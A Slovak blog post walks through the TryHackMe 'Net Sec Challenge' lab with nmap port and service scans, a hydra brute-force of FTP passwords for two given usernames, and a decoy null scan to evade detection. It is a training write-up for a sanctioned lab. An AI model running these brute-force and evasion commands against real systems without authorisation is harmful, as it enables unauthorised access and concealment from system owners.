Príspevok

TryHackMe - Výzva Net Sec

Zábavný a informatívny spôsob, ako zlepšiť znalosti o bezpečnosti siete a zručnosti pri enumerácii pomocou nmap

Uverejnené
Preview Image
Od René Bui
2 minút čítanie
TryHackMe - Výzva Net Sec

Úvod

Toto je praktická miestnosť modulu https://tryhackme.com/module/network-security.

Tento modul je naozaj odporúčaný, naozaj dobré oboznámenie sa s nástrojom nmap a sieťami vo všeobecnosti.

Tryhackme Room Link

Na nasledujúce otázky môžeme odpovedať pomocou Nmap, Telnetu a Hydry.

Aké je najvyššý otvorený port menší ako 10 000?

Pre túto časť potrebujeme iba základný nmap sken

1

nmap 10.10.82.60

Nmap

Odpoveď:

1

8080

Mimo základných 1000 portov je otvorený port; je nad 10 000. Ktorý to je?

Pridáme -p-, aby nmap prehľadal všetky porty

1

nmap 10.10.82.60 -p-

All ports

Odpoveď:

1

10021

Koľko TCP portov je otvorených?

Stačí len spočítať TCP porty z predchádzajúceho nmapu

Odpoveď:

1

6

What is the flag hidden in the HTTP server header?

Použijeme -sC, ktorý je ekvivalentom --script=default, ktorý:

  1. Skontrolujte zraniteľnosti
  2. Získa bannery bežiacich služieb
  3. Detekuje nesprávne konfigurácie

-sV sa pokúsi určiť verziu spustených služieb

-p 80 špecifikujeme port, keďže hľadáme http header, nech skenovanie prebehne rýchlejšie

Http Header

Odpoveď:

1

THM{CENSORED}

Aká je vlajka, ktorá je skrytá v SSH hlavičke servera?

Takže urobíme to isté, nmap, ale s -p 22 namiesto 80

SSH

1

nmap 10.10.82.60 -sC -sV -p 22

Odpoveď:

1

THM{CENSORED}

Máme FTP server, ktorý počúva na neštandardnom porte. Aká je verzia FTP servera?

Ok, takže môžeme špecifikovať 5-miestny port, na ktorý sme narazili pri skenovaní s flagom -p-

1

nmap 10.10.82.60 -sC -sV -p 10021

SSH

Odpoveď:

1

vsftpd 3.0.5

Pomocou sociálneho inžinierstva sme získali dve používateľské mená: eddie a quinn. Aká vlajka je skrytá v jednom z týchto účtov a prístupná cez FTP?

Ok, dostali sme 2 používateľské mená, takže teraz môžeme bruteforcom urobiť nasledovné:

  1. Vytvoriť zoznam používateľských mien a vpísať doň eddie a quinn
  2. Použiť hydra na bruteforce na heslo pomocou zoznamu hesiel z rockyou.txt
1
2

echo 'eddie' > users.txt && echo 'quinn' >> users.txt
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.82.60:10021

SSH

A môžeme sa pripojiť cez ftp pomocou prihlasovacích údajov a neštandardného portu 10021 a nájsť vlajku

FTP Flag

Takže teraz už len stiahneme a prečítame súbor

FTP Flag2

Odpoveď:

1

THM{CENSORED}

Prehliadaním stránky http://10.10.82.60:8080 sa zobrazí malá výzva, ktorá vám dá vlajku, keď ju vyriešite. Čo je vlajka?

Zdá sa, že výzvou je zostať čo najmenej rozpoznaný, takže používame nasledujúce flagy:

  1. -D - návnada, vyzerá to tak, že skenovanie prichádza z viacerých IP adries
  2. -sN posiela TCP pakety bez nastavených flagov (žiadne SYN, ACK, FIN atď.)
    • Ak je port otvorený, cieľ neodpovedá
    • Ak je port zatvorený, cieľ odošle odpoveď RST

⚠️ POZOR - toto NEFUNGUJE proti systémom Windows, pretože systém Windows považuje pakety bez označenia za neplatné a zahodí ich

1

nmap -D 10.10.0.1,10.10.0.2,10.14.99.72 -sN 10.10.82.60

Undetected

Odpoveď:

1

THM{CENSORED}
TryHackMe
web linux
Tento príspevok je licencovaný pod CC BY 4.0 autorom.